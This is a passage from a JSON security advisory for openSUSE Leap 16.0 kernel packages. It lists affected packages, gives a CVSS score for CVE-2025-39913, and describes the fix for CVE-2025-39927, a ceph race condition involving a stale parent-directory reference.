"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39927",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39927"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix race condition validating r_parent before applying state\n\nAdd validation to ensure the cached parent directory inode matches the\ndirectory info in MDS replies. This prevents client-side race conditions\nwhere concurrent operations (e.g. rename) cause r_parent to become stale\nbetween request initiation and reply processing, which could lead to\napplying state changes to incorrect directory inodes.\n\n[ idryomov: folded a kerneldoc fixup and a follow-up fix from Alex to\n move CEPH_CAP_PIN reference when r_parent is updated:\n\n When the parent directory lock is not held, req-\u003er_parent can become\n stale and is updated to point to the correct inode. However, the\n associated CEPH_CAP_PIN reference was not being adjusted. The\n CEPH_CAP_PIN is a reference on an inode that is tracked for\n accounting purposes. Moving this pin is important to keep the\n accounting balanced. When the pin was not moved from the old parent\n to the new one, it created two problems: The reference on the old,\n stale parent was never released, causing a reference leak.\n A reference for the new parent was never acquired, creating the risk\n of a reference underflow later in ceph_mdsc_release_request(). This\n patch corrects the logic by releasing the pin from the old parent and\n acquiring it for the new parent when r_parent is switched. This\n ensures reference accounting stays balanced. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
